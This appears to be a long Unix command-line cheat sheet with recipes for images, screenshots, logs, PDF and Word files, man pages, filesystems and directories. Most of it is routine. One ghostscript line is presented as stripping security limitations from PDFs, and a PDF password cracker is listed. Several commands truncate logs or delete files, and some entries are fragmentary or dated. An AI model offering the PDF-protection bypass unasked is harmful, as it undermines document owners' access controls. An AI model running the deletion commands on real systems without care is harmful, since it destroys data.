xli - another one
aview - ascii image viewer
asciiview - a convenience wrapper around aview
feh - a fast command line driven image viewer
gthumb - a gnome viewer and simple editor
geeqie - gtk image viewer
gpicview - small image viewer
gqview - simple gtk image viewer emacs style keys
eye of gnome - the gnome viewer
mirage - simple gtk viewer with thumbnails
imgseek - image viewer manager, requires python
pqiv - similar to qiv but different, very basic
qiv - quick image viewer up to date
gwenview - kde image viewer
showfoto - kde

The process of creating an image from what is currently displayed on the computer screen is generally known as "screen capture" or a "screenshot"

take a screenshot of the desktop window after 5 seconds, and display it

 import -pause 5 -window root desk.png; display desk.png
 scrot -d 5 desk.png; display desk.png    the same

Using a pause like this before taking the screenshot allows you to rearrange the windows on the desktop if you so desire.

take a screen shot of the whole screen and save it to 'test.png'

 scrot test.png

take a low-quality screen shot in 'test.png' and display it

 scrot -q 10 test.png; feh test.png

on macosx capture the whole screen as a jpg image and display it

 screencapture -tjpg test.jpg; open test.jpg

make an image of the currently focused window and save it as 'test.jpg'

 scrot -u test.jpg

capture a window, with its window frame, save in the file 'i.png'

 import -frame i.png

After typing this, left-click on the window you want to capture. In other words, this is an 'interactive' technique for capturing an image of a window.

Meta Data ‹↑›

change the exif date and time of an image

 exiftool -DateTimeOriginal='2009:01:01 02:03:04' file.jpg

set the exif timestamp of an image to the current date and time

 exiv2 -M"set Exif.Photo.DateTimeOriginal `date "+%Y:%m:%d %H:%M:%S"`" filename.jpg

Image Information ‹↑›

show the width x height of the image "bird.png"

 identify -format "%wx%h" bird.png  prints "16x20" for example

rename all "png" files, so that the name includes the width and height

 for f in *.png; do rename "s/\./-"$(identify -format "%wx%h" $f)"./" $f; done

Optimizing Images ‹↑›

optimize png images

 optipng image.png    debian: optipng

tools for screen capture
import - makes screen shots part of 'imagemagick' package.
scrot - a simple command line screen capture utility
screencapture - the macosx (jaguar) utility

Transforming Images ‹↑›

reduce in size all jpeg images in the folder by 50%

 mogrify -resize 50% *.jpg    the images are changed

reduce by 50% an image and save the reduced image as "rose2.jpg"

 convert rose.jpg -resize 50% rose2.jpg

rotate an image by 90 degrees where the height exceeds the width

 mogrify -rotate '90<' image.jpeg

rotate an image where the width exceeds the height

 mogrify -rotate '90>' image.jpeg

convert an image to black and white

 mogrify -monochrome colourful.jpeg

add a grey border 2px wide and 4px high around an image

 mogrify -border 2x4 cat.jpg
 mogrify -frame 8x8 cat.jpg    a bevelled border

Converting Image Formats ‹↑›

convert the jpeg image "rose.jpg" to the "png" format.

 convert rose.jpg rose.png

convert all png images in the current folder to the jpeg format

 mogrify -format jpg *.png    a copy of the images is created

convert a large number of "ico" images to the "png" format

 find . -name "*.ico" | xargs mogrify -format png
this is very fast

Batch resize all images in the current directory

 mogrify -resize 800\> *

Animation ‹↑›

# frame numbers start at 0

show information for all the frames in an animation

 identify tree.ico

display how many frames an animation has

 identify tree.gif | wc -l

extract the 2nd frame from an animated gif and save to "new.gif"

 convert 'animation.gif[1]' new.gif

Resizing Images ‹↑›

Resize photos without changing exif

 mogrify -format jpg -quality 80 -resize 800 *.jpg

resize an image to half (50%) of its original size using imagemagick

 convert -resize 50%x50% image{,_resize}.jpg

crop a 32x32 pixel block starting at pixel (16,16) and save to "new.gif"

 convert tree.gif -crop 32x32+16+16 new.gif

crop a 20 pixel vertical strip starting at the top left hand corner

 convert tree.png -crop 20x0+0+0 new.png

create a 1 row montage with a gap in the middle

 montage medical.gif null: present.gif -tile x1 -geometry +2+2 new.jpg

create a montage with the file name under the image, silver background

 montage -label '%f' x.png -font Arial -pointsize 30 -geometry +0+0 -background silver xy.png

rename images according to exif or jpeg metadata

 exiv2 rename *.jpg

draw a label at the bottom of the image in a grey rectangle (superimposed)

 convert tree.png -fill '#0008' -draw 'rectangle 5,128,114,145' \
   -fill white -annotate +10+141 'Tree' new.png

Images Of Text ‹↑›

create an image, size 165x70, of text "Tree" with text centered in image

 convert -fill blue -font Helvetica -size 165x70  -pointsize 24 \
 -gravity center label:Tree tree.gif

create an image of text, with text font size auto-fitted to image size

 convert -fill blue -font Candice -size 165x70 label:Tree new.gif; feh new.gif

create an image label from text from standard input

 echo "hello!" | convert -fill blue label:@- new.gif; feh new.gif

Compressing Images ‹↑›

reduce the quality (& file size) of an image, and save in "tree-80.jpg"

 convert tree.jpg -quality 80 tree-80.jpg

reduce a jpeg even more by subsampling the colour channels

 convert tree.jpg -sampling-factor 2x1 -quality 80 tree-small.jpg

Visual Art ‹↑›

The open clip art library.

a tag cloud of open clip art
image format notes
png is a lossless format, has transparency
jpg highly compressable, lossy, no transparency
gif animations possible, compressed,

Ascii Art ‹↑›

a demonstration of the aview tool



display an ascii art '.nfo' file (CP437-encoded) in its intended form

 iconv -f437 -tutf8 asciiart.nfo

display a text banner with a 50 character width

 banner -w50 'hello'

draw a box with an ascii-art dog design around the text 'hello'

 echo hello | boxes -d dog

choose from a set of ascii art pictures with speech bubbles

 cowsay -f tux 'hello'

A dead cow thinking about your fortune cookie

 fortune -s -c -a | cowthink -d -W 45

view a video using only 'ascii art'

 mplayer -vo aa <video file>

bulk download files based on a numeric pattern

 curl -O /met-art-free-sample-00[00-19].jpg

create ascii art pictures with various colours


pass a backslash character as an argument to figlet

 figlet $'\\'

write 'chapter 1' as ascii bubble text

 figlet "Chapter 1"

pass a form feed character followed by a pilcrow sign character (octal character code 266) to figlet

 figlet $'\f\266'

plot the curve 'sin(x)' as ascii text

 echo "set terminal dumb; plot sin(x)" | gnuplot -persist

an ascii art font for your readme text

 toilet -f big ReadMe

vertically scrolling ascii banner text

 while true; do banner 'scroll! ' | while IFS= read -r l; do echo "$l"; sleep 0.02; done; done

Patterns And Tilings ‹↑›


Charts And Graphs ‹↑›

for charts and graphs, consider the 'pic' and 'grap' groff preprocessors
debian: rlplot, ygraph, dia

ascii art tools
aview -
cadubi - an ascii art editor
aewan - an ascii art editor
textdraw - create ascii geometric figures
figlet - create ascii text banners
cowsay - create ascii pictures of cows with speech bubbles
banner - show a large ascii banner text

www: graphviz
a package with tools, including 'dot' for drawing network type graphs
Create package dependency graph
 apt-cache dotty PKG-NAME | dot -Tpng | display

Gnuplot ‹↑›

A booklet about the gnuplot tool, in the same format as the current booklet.
This section is only meant as a brief demonstration of what gnuplot is capable of. For more detailed information please consult the booklet mentioned above.

create an image of a sin curve graph and display it

 echo "set t png; set o 'o.png'; p sin(x)" | gnuplot; feh o.png

plot a parabola from the bash shell

 echo 'plot x**2' | gnuplot -persist

plot some data from the command line

 echo 'plot "list.txt" using 2:xticlabels(1)' | gnuplot -persist

show the graph of 'parabola' curve (x to the power of 2)

 plot x**2

Dot ‹↑›

Generate a graph of package dependencies

 apt-cache dotty apache2 | dot -T png | display

Flow Charts And Figures ‹↑›

for drawing flow charts and other figures use


Video ‹↑›

please see the video booklet on this site for more complete information about using video with the linux operating system.

Log Files ‹↑›

In Unix and Linux, 'log' files are used by software to record events: things the program has done, or things that have happened to it. Server software in particular makes great use of log files. Log files are almost always stored as plain text.

Truncate logs in unix

 logs=$(find . -name "*.log"); for log in $logs; do cat /dev/null > "$log"; done
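A null-safe sketch of the same truncation, for file names containing spaces, using GNU xargs and the coreutils 'truncate' tool:

```shell
# Empty every .log file below the current directory; -print0/-0 keep
# file names with spaces intact, and 'truncate -s 0' empties each
# file without deleting it (-r: do nothing if no files match).
find . -type f -name '*.log' -print0 | xargs -0 -r truncate -s 0
```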

Get all possible problems from any log files

 grep -2 -iIr "err\|warn\|fail\|crit" /var/log/*

Follow the most recently updated log files

 ls -drt /var/log/* | tail -n5 | xargs sudo tail -n0 -f

Quickly analyze apache logs for top 25 most common IP addresses.

 cat $(ls -tr | tail -1) | awk '{ a[$1] += 1; } END { for(i in a) printf("%d, %s\n", a[i], i ); }' | sort -n | tail -25
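The same count can also be done with sort and uniq; a sketch as a small function, assuming the client IP is the first field of each log line (as in Apache's common/combined formats):

```shell
# Print the N busiest client IPs in an access log.
# usage: top_ips N logfile   (assumes the IP is field 1 of each line)
top_ips() {
  awk '{ print $1 }' "$2" | sort | uniq -c | sort -rn | head -n "$1"
}
```

e.g. `top_ips 25 /var/log/apache2/access.log`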

Extract XML from an otherwise plain text log file

 sed -n '/<Tag>/,/<\/Tag>/p' logfile.log

Convert one or more (log, source code, ...) files to a colourised HTML page

 enscript -E --color -t "title" -w html --toc -p /PATH/to/output.html /var/log/*log

tail, with specific pattern colored

 tail -F file | egrep --color 'pattern|$'

Watch several log files in a single window

 multitail /var/log/messages /var/log/apache2/access.log /var/log/

A robust, modular log coloriser

 tail -f /var/log/syslog | ccze
a useful tail in /var/log which avoids old and/or gzipped log files

 tail -f *[!.1][!.gz]

Export log to html file

 cat /var/log/auth.log | logtool -o HTML > auth.html

follow the end of the log file 'tcp.log' showing new data as it enters

 less +F tcp.log   press [control] c to stop following
 tail -f tcp.log   the same, but you can't move up and down the file
 tailf tcp.log     the same

Monitor logs in Linux using Tail

 find /var/log -type f -exec file {} \; | grep 'text' | cut -d' ' -f1 | sed -e's/:$//g' | grep -v '[0-9]$' | xargs tail -f

Ms Word Documents ‹↑›

extract plain text from MS Word docx files

 unzip -p some.docx word/document.xml | sed -e 's/<[^>]\{1,\}>//g; s/[^[:print:]]\{1,\}//g'
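The sed expression in the recipe above does the tag stripping; isolated as a function it can be applied to any XML-ish stream (a sketch; the docx-specific unzip step is unchanged):

```shell
# Remove anything that looks like an XML/HTML tag from stdin.
strip_tags() {
  sed -e 's/<[^>]\{1,\}>//g'
}
```

e.g. `unzip -p some.docx word/document.xml | strip_tags`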

find and grep Word docs

 find . -iname '*filename*.doc' | { while read line; do antiword "$line"; done; } | grep -C4 search_term;

view a microsoft word document

 antiword resume.doc | less
convert a ms word document to text

 antiword, catdoc

display the 'list.doc' file as plain text

 catdoc list.doc | less

convert the Word file 'resume.doc' to LaTeX

 word2x -f latex resume.doc    writes a new file, 'resume.ltx'

convert all of the '.DOC' Word files in the current directory to LaTeX files with maximum line widths of 40 characters

 word2x -f latex -w 40 *.DOC

convert the Word file 'resume.doc' to a plain text file called 'resume'

 word2x -f text resume.doc resume

search the text of the Word file 'resume.doc' for the string 'linux' regardless of case

 word2x resume.doc - | grep -i linux

Postscript Documents ‹↑›

Postscript is a document format very well suited to printing. However, it is more difficult to view than Adobe's PDF format, since PDF viewers are more widely installed, especially on Microsoft Windows computers.

view a postscript file

 gv file.ps

view a postscript file as plain text

 ps2ascii file.ps | less

Converting Postscript To Other Formats ‹↑›

convert a postscript document to the pdf format

 ps2pdf eg.ps   a file called "eg.pdf" is created

convert a postscript file to plain text

 ps2ascii file.ps file.txt
Pdf Documents ‹↑›

debian packages: xpdf, xpdf-utils

graphing tools
picviz - plotter for parallel co-ordinates

Merge *.pdf files

 gs -q -sPAPERSIZE=letter -dNOPAUSE -dBATCH -sDEVICE=pdfwrite -sOutputFile=out.pdf `ls *.pdf`

Merge several pdf files into a single file

 pdftk "$@" cat output merged.pdf    (inside a script; "$@" is the list of input files)

create a pdf of the file 'test.txt'

 enscript test.txt -o - | ps2pdf - ~/tmp/test.pdf

create a pdf of a directory listing of the current folder

 ls | enscript -o - | ps2pdf - ~/tmp/ls.pdf

Convert images to a multi-page pdf

 convert -adjoin -page A4 *.jpeg multipage.pdf

Get pages number of the pdf file

 pdfinfo file.pdf | awk '/Pages/'

Save man pages to pdf

 man -t man | ps2pdf - > man.pdf

separate a pdf document into single pages and report its data

 pdftk mydoc.pdf burst

Merge Two or More PDFs into a New Document

 pdftk 1.pdf 2.pdf 3.pdf cat output 123.pdf

Optimize Xsane PDFs

 gs -q -sPAPERSIZE=a4 -dNOPAUSE -dBATCH -sDEVICE=pdfwrite -sOutputFile=test.pdf multipageproject.pdf

Merge several pdf files into a single file

 gs -q -sPAPERSIZE=a4 -dNOPAUSE -dBATCH -sDEVICE=pdfwrite -sOutputFile=out.pdf a.pdf b.pdf c.pdf

Remove security limitations from PDF documents using ghostscript

 gs -q -dNOPAUSE -dBATCH -sDEVICE=pdfwrite -sOutputFile=OUTPUT.pdf -c .setpdfwrite -f INPUT.pdf

Viewing Pdf Documents ‹↑›

view a pdf file as plain text

 pdftotext file.pdf - | less

view a compressed pdf document

 zxpdf book.pdf.gz

view a pdf document

 xpdf book.pdf       xpdf appears much faster than "acroread"
 acroread book.pdf   it's easier to select text in acroread

view the 10th page of a pdf document with a zoom factor of 200%

 xpdf -z 200 book.pdf 10

view a pdf document in "continuous" mode starting at the 5th page

 xpdf -cont book.pdf 5  one can scroll smoothly through the whole file

view a pdf document in full-screen mode

 xpdf -fullscreen book.pdf   the -z zoom option doesn't work with fullscreen

view a pdf document with the colours reversed (usually white text on black)

 xpdf -rv book.pdf

Analyse Pdf Documents ‹↑›

extract the images from 'report.pdf' and save them in jpeg format

 pdfimages -j report.pdf img   images are saved as img-000.jpg, img-001.jpg ...

display information about a pdf document

 pdfinfo book.pdf

show how many pages a pdf document has

 pdfinfo book.pdf | sed -n "/Pages:/s/^ *Pages: *//p"
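The sed step above just pulls the number off pdfinfo's "Pages:" line; factored into a function it can be tested without a pdf at hand (the exact "Pages:" line format of pdfinfo's output is assumed):

```shell
# Read pdfinfo-style output on stdin and print the page count.
# Expects a line of the form "Pages:          12".
page_count() {
  sed -n 's/^Pages:[[:space:]]*//p'
}
```

e.g. `pdfinfo book.pdf | page_count`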

show the page size of a pdf document

 pdfinfo book.pdf | grep -i "Page size:"

show what fonts are used in a pdf document

 pdffonts book.pdf

Editing Pdf Files ‹↑›


Converting Pdf To Images ‹↑›

some hints on converting to another format
The 'convert' tool forms part of the imagemagick suite of tools

convert 'file.pdf' to a low quality 'png' format image

 convert file.pdf file.png

convert 'file.pdf' to a high quality 'png' format image

 convert -density 300 file.pdf file.png

convert 'file.pdf' to a high quality 'jpeg' format image

 convert -density 300 file.pdf file.jpg

convert 'file.pdf' to a high quality jpeg, cropping all whitespace

 convert -density 300 -trim file.pdf file.jpg
 convert -density 300 -trim +repage file.pdf file.jpg  the diff?

Note: if the pdf file contains page numbers, then the -trim function will probably not work as well as you were hoping.

Convert PDF to JPEG using Ghostscript

 gs -dNOPAUSE -sDEVICE=jpeg -r144 -sOutputFile=p%03d.jpg file.pdf

Pdf To Postscript ‹↑›

make a copy of 'file.pdf' in postscript format called 'file.ps'

 pdftops file.pdf

Pdf To Text ‹↑›

convert a pdf document to plain text (without any formatting)

 pdftotext file.pdf  a file called "file.txt" is created

convert the pdf file "file.pdf" to a plain text file "output.txt"

 pdftotext file.pdf output.txt
 ps2ascii file.pdf output.txt  more or less the same


From Other Formats ‹↑›

convert a web page into a pdf

 touch $2;firefox -print $1 -printmode PDF -printfile $2

The Info Help Reader ‹↑›

Nice info browser


The info reader.

For some incomprehensible reason, the GNU people decided that they didn't like "man" pages and so they invented a whole new help document reader called "info". It's a nasty little second-rate hypertext viewer which forces you to learn a whole new set of arbitrary keystrokes in order to move around the document (maybe they're "emacs" keystrokes, who knows). What's more, instead of just calling pages "pages", info calls them "nodes", to be as pretentious as it possibly can. But anyway, you may have to use it.

view the "info" help document for Latex

 info latex

useful pdf programs
evince - view a pdf or postscript file
xpdf - view a pdf file
pdftops - convert to postscript
pdftotext - convert or view a pdf file as plain text
pdfinfo - display lots of information about a pdf document
pdfimages - extract images from pdffiles
pdffonts - show what fonts are used in a pdf document
pdftoppm - convert pdf pages to ppm images
xpdfrc - the xpdf configuration file
pdfcrack - PDF files password cracker
pdfjam - collection of PDF document handling utilities
pdftk - A useful tool for manipulating PDF documents
pdftohtml - Translates PDF documents into HTML format

Man Pages ‹↑›

'man' (manual) pages are the traditional Unix way to document a program, command or package. They are text files with simple 'markup' codes which are then processed by the troff tool.
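Since man pages are just troff source with 'man' macros, you can write and preview a small one directly. A sketch (the command name 'hello' and the file names are invented for the example, and the preview step runs only if groff is installed):

```shell
# Write a minimal man page in troff 'man' macro format.
cat > hello.1 <<'EOF'
.TH HELLO 1 "March 2012" "hello 1.0" "User Commands"
.SH NAME
hello \- print a friendly greeting
.SH SYNOPSIS
.B hello
.SH DESCRIPTION
Prints a greeting to standard output.
EOF

# Preview it if groff is available ('man ./hello.1' also works on
# many systems).
if command -v groff >/dev/null 2>&1; then
  groff -man -Tutf8 hello.1 | head -n 5
fi
```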

Colorful man

 /usr/bin/man man | /usr/bin/col -b | /usr/bin/iconv -c | view -c 'set ft=man nomod nolist nospell nonu' -

see the conventions for writing a man page

 man 7 man

view a compressed man page in section 1 in its raw plain text format

 zcat /usr/share/man/man1/zless.1.gz | less
this may be useful if you wish to write a man page

see where the 'man' command searches for man pages

 manpath
list all the directories in the man pages path

 ls $(manpath | tr ':' ' ')

Some "info" reader commands
[space] move forward a page
[del] move back a page, or to the previous node if at the top of the page
q exit the Info document viewer
? show some keystrokes which are available
h show an "info" tutorial, if available
[tab] go to the next link on the page
[enter] jump to the link under the cursor
??? how to go to the previous link is anyone's guess [M-TAB] ???
l go to the last page that was viewed (like a browser "back button")
n open the next page in the document
p open the previous page in the document
u go "up" one level in the document (usually to a table of contents)
t go to the main table of contents for the document
d view a list of all Info documents
b go to the top of the current page
e go to the end of the current page
m type the name of a link to jump to (can type partial names)
i type the name of any node to jump to
/ search for a string in the current page

automatically generate man pages from C, C++, Java, Python ... source code

 doxygen   doxygen can also generate documentation in html, latex etc

a cgi script for generating html man pages


save the word count tool (wc) man page as plain text

 man wc | col -b > wc.txt

Documentation Systems ‹↑›

groff, texinfo, docbook, halibut

Source Code Documentation Systems ‹↑›

doxygen, javadoc, pod (perl's documentation format)

Xml ‹↑›

check if an xml or html document is well formed (valid)

 curl -s '' > bcc.html; xmlwf bcc.html
'xmlwf' is part of the 'expat' package

Editing Text ‹↑›

In the traditional unix world, the choice of text editor is often seen as a choice between vim and emacs. But many other good choices exist.

www: tea
- ?
www: sam
An editor written by Rob Pike which is in turn used by various veteran unix forefathers. Sam makes more use of the mouse.
www: acme
Another editor by Rob Pike.
www: joe
'joes own editor' possibly the simplest text editor to use ...
www: nano,
pico small reasonably easy to use text editors originating from the pine email program.
www: vim
'vi improved' - a programmers' editor for people who write a great deal of text and preferably can type without looking at the keyboard. It is strange and annoying for new users.
www: emacs
'editing macros' - capable of just about anything, but don't use it, because I think it's bad.

graphical text editors

Batch Editing Text Files ‹↑›

Batch editing of text files involves editing several or many text files at once, usually in a non-interactive way.

- use vim with the "argdo" function
- use perl with the "-i" switch
- some versions of "sed" do not have the "-i" switch, so perl must be used

Before doing a "batch" edit of text files, it is probably a good idea to check what changes will take place, without actually changing anything.

add the word "green" after the 500th line of the file "report.txt"

 echo -e "500a\ngreen\n.\nw\nq\n" | ed report.txt
 (echo "500a"; echo "green"; echo -e "w\nq\n") | ed report.txt the same

preview replacing "Daniel" with "Dan" in all files with a ".txt" extension

 grep -l "Daniel" $(find . -name "*.txt") | xargs sed -n "s/Daniel/Dan/p"
the original files are left unchanged; with the sed "-n" flag and "p" command,
only the changed lines are displayed

In all files with a ".txt" extension replace "Daniel" with "Dan"

 grep -l "Daniel" $(find . -name "*.txt") | xargs sed -i.bak "s/Daniel/Dan/g"

In "html" files NOT containing the text "Notes:", add a final line "Notes:"

 grep -L "Notes:" $(find . -name "*.html") | xargs sed -i.bak '$s/$/\nNotes:/'
a copy of each changed file is kept with the extension ".bak"; all html files
in the current folder and subfolders are affected

replace the word "big" with small in all files in this and subfolders

 perl -p -i.bak -e 's/\bbig\b/small/g' $(grep -ril big *)
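The preview-then-apply workflow described above can be sketched end to end on a single file; the sample file is created first so the sketch is self-contained:

```shell
# Create a small sample file for the demonstration.
printf 'Dear Daniel,\nregards\n' > report.txt

# 1. Preview: print only the lines that would change, changing nothing.
sed -n 's/Daniel/Dan/gp' report.txt

# 2. Apply: edit the file in place, keeping the original as report.txt.bak.
sed -i.bak 's/Daniel/Dan/g' report.txt
```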

Unix Directory Structure ‹↑›

Unix has a standard folder hierarchy in which each folder is designed to serve a specific purpose and contain certain sorts of files.

search google: "unix file system standard", "linux file system standard", FS-Stnd

show detailed information about what each folder is used for

 man hier

man sections
1 user commands executable from a shell
2 kernel system calls
3 library functions and calls (such as libc)
4 special files such as in /dev
5 file formats and conventions (such as /etc/password)
6 games
7 conventions and miscellaneous, file system layout.
8 system management commands such as mount(8)
9 kernel routines. this is an obsolete manual section.

Fonts ‹↑›

Refresh the cache of font directory

 sudo fc-cache -f -v

show which fonts are installed

 fc-list | cut -d ':' -f 1 | sort -u

show what fonts are installed for the japanese language

 fc-list :lang=ja

Installing True-Type fonts

 cd /usr/share/fonts/miscttf; ttmkfdir > fonts.scale; mkfontdir; fc-cache

A very incomplete summary of the Unix directory structure
/usr/bin/ - executable files (binary shell scripts etc)
/usr/sbin/ - secure executable files
/usr/local/bin - executables only on the current machine
/usr/share/ - files used by many programs dictionaries, icons etc
/usr/share/doc - documentation files
/var/ - data files which change regularly (eg log files)
/dev/ - peripheral devices (sound cards usb drives etc)
/etc/ - configuration files for programs

File Systems ‹↑›

Force file system check

 touch /forcefsck

Backup files incremental with rsync to a NTFS-Partition

 rsync -rtvu --modify-window=1 --progress /media/SOURCE/ /media/TARGET/

www: gparted
a graphical partitioner and file-system formatter
www: fdisk
a command line tool
Check the age of the filesystem
 df / | awk '{print $1}' | grep dev | xargs tune2fs -l | grep create

currently mounted filesystems in nice layout

 column -t /proc/mounts

Converts ext2 to ext3

 tune2fs -j /dev/sdX

migrate existing ext3 filesystems to ext4

 tune2fs -O extents,uninit_bg,dir_index /dev/yourpartition

Show the UUID of a filesystem or partition

 sudo vol_id -u /dev/sda1

resize a mounted ext3 file system

 v=/dev/vg0/lv0; lvextend -L+200G $v && resize2fs $v

Iso Files ‹↑›

convert .daa to .iso

 poweriso convert image.daa -o image.iso -ot iso

Create a CD/DVD ISO image from disk.

 readom dev=/dev/scd0 f=/path/to/image.iso

Mount a .iso file in UNIX/Linux

 mount /path/to/file.iso /mnt/cdrom -oloop

convert .bin / .cue into .iso image

 bchunk IMAGE.bin IMAGE.cue IMAGE.iso

Mount and umount iso files

 miso () { mkdir ~/ISO_CD && sudo mount -o loop "$@" ~/ISO_CD && cd ~/ISO_CD && ls; }
 uiso () { cd ~ && sudo umount ~/ISO_CD && rm -r ~/ISO_CD; }

Partitions ‹↑›

A partition is a way of dividing a hard-disk or other storage media into several logical 'disks'.

Mount a partition from within a complete disk dump

 INFILE=/path/to/your/backup.img; MOUNTPT=/mnt/foo; PARTITION=1; mount "$INFILE" "$MOUNTPT" -o loop,offset=$[ `/sbin/sfdisk -d "$INFILE" | grep "start=" | head -n $PARTITION | tail -n1 | sed 's/.*start=[ ]*//' | sed 's/,.*//'` * 512 ]

File System Types ‹↑›

a good chronological table of file systems
an article about the vfat file system
font tools
gucharmap - browse the fonts on the computer
waterfall - show characters from a font in all sizes

view all mounted file system types

 df -T

Mounting And Unmounting Filesystems ‹↑›

Mount proc

 mount -t proc{,,}

currently mounted filesystems in nice layout

 mount | column -t

Mount a temporary ram partition

 mount -t tmpfs tmpfs /mnt -o size=1024m

Mount folder/filesystem through SSH

 sshfs name@server:/path/to/folder /path/to/mount/point

Mount a partition from within a complete disk dump

 lomount -diskimage /path/to/your/backup.img -partition 1 /mnt/foo

umount all nfs mounts on machine

 umount -a -t nfs

mount directories in different locations

 mount --bind /old/directory/path /new/directory/path

Symbolic Links ‹↑›

Find broken symlinks and delete them

 find -L /path/to/check -type l -delete

Find broken symlinks

 find . -type l ! -exec test -e {} \; -print

Propagate a directory to another and create symlink to content

 lndir sourcedir destdir

show the status of all symlinks in the current folder

 symlinks -r $(pwd)

List all symbolic links in current directory

 find /path -type l

Find dead symbolic links

 find . -type l | perl -lne 'print if ! -e'

Show the disk usage for files pointed to by a symbolic link

 find /usr/lib -maxdepth 1 -type l -print0 | xargs -r0 du -Lh

Eliminate dead symlinks interactively in /usr/ recursevely

 find /usr/ -type l ! -xtype f ! -xtype d -ok rm -f {} \;

Get the canonical, absolute path given a relative and/or

 readlink -f ../super/symlink_bon/ahoy

Directories ‹↑›

Directories, also known as 'folders', are a way of organising files hierarchically.

Push your present working directory to a stack that you can pop

 pushd /tmp

display the directories one level below the current one

 tree -dL 1 | less

display the whole directory tree below the current folder

 tree -d | less

another directory tree

 find . -type d -print | sed -e 's;[^/]*/;..........;g'| awk '{print $0"-("NR-1")"}'

Go to parent directory of filename edited in last command

 cd `dirname $_`

Convert the contents of a directory listing into a colon-separated

 find . -name '*' -printf '%f:'

find and delete empty directories recursively

 find . -depth -type d -empty -exec rmdir -v {} +

Find the 20 biggest directories on the current filesystem

 du -xk | sort -n | tail -20

Get the size of all the directories in current directory

 du --max-depth=1

Replicate a directory structure dropping the files

 for x in `find /path/ -type d | cut -b bytesoffoldername-`; do mkdir -p newpath/$x; done

Go to the next sibling directory in alphabetical order

 for d in `find .. -mindepth 1 -maxdepth 1 -type d | sort`; do if [[ `basename $d` > `basename $PWD` ]]; then cd $d; break; fi; done

maybe the quickest way to get the current program name minus the path

 echo "${0##*/}"
Huh? Where did all my precious space go ?

 ls -la | sort -k 5bn

fast access to any of your favorite directory.

 alias pi='`cat ~/.pi | grep ' ; alias addpi='echo "cd `pwd`" >> ~/.pi'

Remove empty directories

 find . -type d -empty -delete

Count the total number of files in each immediate subdirectory

 find . -type f -printf "%h\n" | cut -d/ -f-2 | sort | uniq -c | sort -rn

Browsing Folders ‹↑›

Start a file browser in the current directory

 screen -d -m nautilus --no-desktop `pwd`

File browser in the dwm minimalist window manager

 xdg-open $(ls -1 . | dmenu)

browse the current folder with the gnome file manager

 nautilus .
Restart nautilus, the gnome file manager

 killall nautilus

Analysing Directories ‹↑›

list hidden files and folders in the current folder

 ls -d .*

List only the directories

 ls -l | egrep ^d

Sort the size usage of a directory tree with human-readable sizes

 dh() { du -ch --max-depth=1 "${@-.}" | sort -h; }

a few common file-system types
fat32 - created 1996 by microsoft, appeared in windows 95b
vfat - ?
ntfs v5.1 - created 2001 by microsoft and used in windows xp
ntfs v6 - 2006 by microsoft for windows vista
ext2 - created in 1993 and used by linux and hurd
ext3 - created 1999 used in linux
reiserfs - created 2001 by namesys used in linux
google file system - created 2003 by google for linux
gfs2 - 2006 by red hat for linux
ext4 - 2006 for linux

Folder Size ‹↑›

Watch the size of a directory using figlet

 watch -n1 "du -hs /home/$USER | cut -f1 -d'/' | figlet -k"

show the total size of the current directory

 du -sh

display disk usage for the current folder in a readable form

 du -sh *    displays values such as 2G, 43K, 12M etc

show available disk space in a readable form (2G, 42K etc)

 df -h

Print the 10 deepest directory paths

 find . -type d | perl -nle 'print s,/,/,g," $_"' | sort -n | tail

Comparing Folders ‹↑›

Recursively compare two directories and output their differences

 diff -urp /originaldirectory /modifieddirectory

Making Folders ‹↑›

make directory tree

 mkdir -p work/{d1,d2}/{src,bin,bak}

make 100 directories with leading zero, 001...100, using bash3.X

 mkdir $(printf '%03d\n' {1..100})

Changing Folders ‹↑›

Go up multiple levels of directories quickly and easily.

 alias ..="cd .."; alias ...="cd ../.."; alias ....="cd ../../.."

go to the previous directory

 cd -

go to the user's home directory

 cd

go to the previous sibling directory in alphabetical order

 cd ../"$(ls -F ..|grep '/'|grep -B1 `basename $PWD`|head -n 1)"

Copying Folders ‹↑›

Recursively copy folders/files, preserving their permissions and ownership

 cd /source/directory; tar cf - . | tar xf - -C /destination/directory

copy/mkdir and automatically create parent directories

 cp --parents /source/file /target-dir

create a copy of the 'book' folder as 'book-bak'

 cp -r book book-bak

copy a folder, but only newer files and display all files copied

 cp -vur book book-bak

copy a directory to another, only where files are newer

 cp -ru sourcefolder targetfolder
or use the 'rsync' tool instead of 'cp'

make a folder and create parent folders if necessary

 mkdir -p ./new/path/
if the folder './new' doesn't exist it will also be created

Deleting Folders ‹↑›

take a look at what a command would do before running it

 find /tmp -type f -printf 'rm "%p";\n'

remove a directory

 rm -r folder      where the dir is not empty: be careful

make an archive of the folder 'tree' excluding .exe files

 tar -cvz --exclude='*.exe' -f folder.tar.gz tree

Disk Usage Tools ‹↑›

disk usage tools
firelight - a graphical tool

Files ‹↑›

Create a bunch of dummy files for testing

 touch {1..10}.txt

Empty a file

 > foobar.txt

list all open files

 lsof   this lists all open files, pipes, sockets etc
 lsof -i TCP  show open TCP sockets

show the number of open files for the root user

 lsof | grep ' root ' | awk '{print $NF}' | sort | uniq | wc -l
 lsof | grep ' root ' | awk '{print $NF}' | sort -u | wc -l   the same

find out what sort of file is 'mys' (i.e. what is the file type)

 file mys

show the last modification time of a file or folder

 date -r file

File Size ‹↑›

Alternative size (human readable) of files and directories

 du -ms * | sort -nk1

Another way to calculate sum size of all files matching a pattern

 find . -iname '*.jar' | xargs du -ks | cut -f1 | xargs echo | sed "s/ /+/g" | bc

Analysing Files ‹↑›

Find files that were modified by a given command

 strace <name of the program>

Sum size of files returned from FIND

 find [path] [expression] -exec du -ab {} \; | awk '{total+=$1} END {print total}'

list files with last modified at the end

 alias lrt='ls -lart'

Find writable files

 find -writable

list and sort files by size in reverse order (file size in human

 ls -S -lhr

Get file access control list

 getfacl /mydir

Show latest changed files

 ls -ltcrh

Sort files by size

 ls -l | sort -nk5

Find Duplicate Files (based on size first, then MD5 hash)

 find -not -empty -type f -printf "%s\n" | sort -rn | uniq -d | xargs -I{} -n1 find -type f -size {}c -print0 | xargs -0 md5sum | sort | uniq -w32 --all-repeated=separate

File Names ‹↑›

Substitute spaces in filename with underscore

 ls -1 | rename 's/\ /_/'

Copying Files ‹↑›

File Type Conversion Programs
dvips tex/latex dvi --> postscript
ps2pdf postscript --> adobe pdf
ghostscript postscript --> gif image
groff groff-pic --> postscript

find and copy scattered mp3 files into the users images folder

 find ~ -iname '*.mp3' -type f -print0 | xargs -I{} -0 cp {} ~/images

prevent replacing an existing file by mistake

 set -o noclobber

Copy all PDF documents on the disk to your ~/Documents/PDF folder

 find / -name "*.pdf" -exec cp -t ~/Documents/PDF {} +

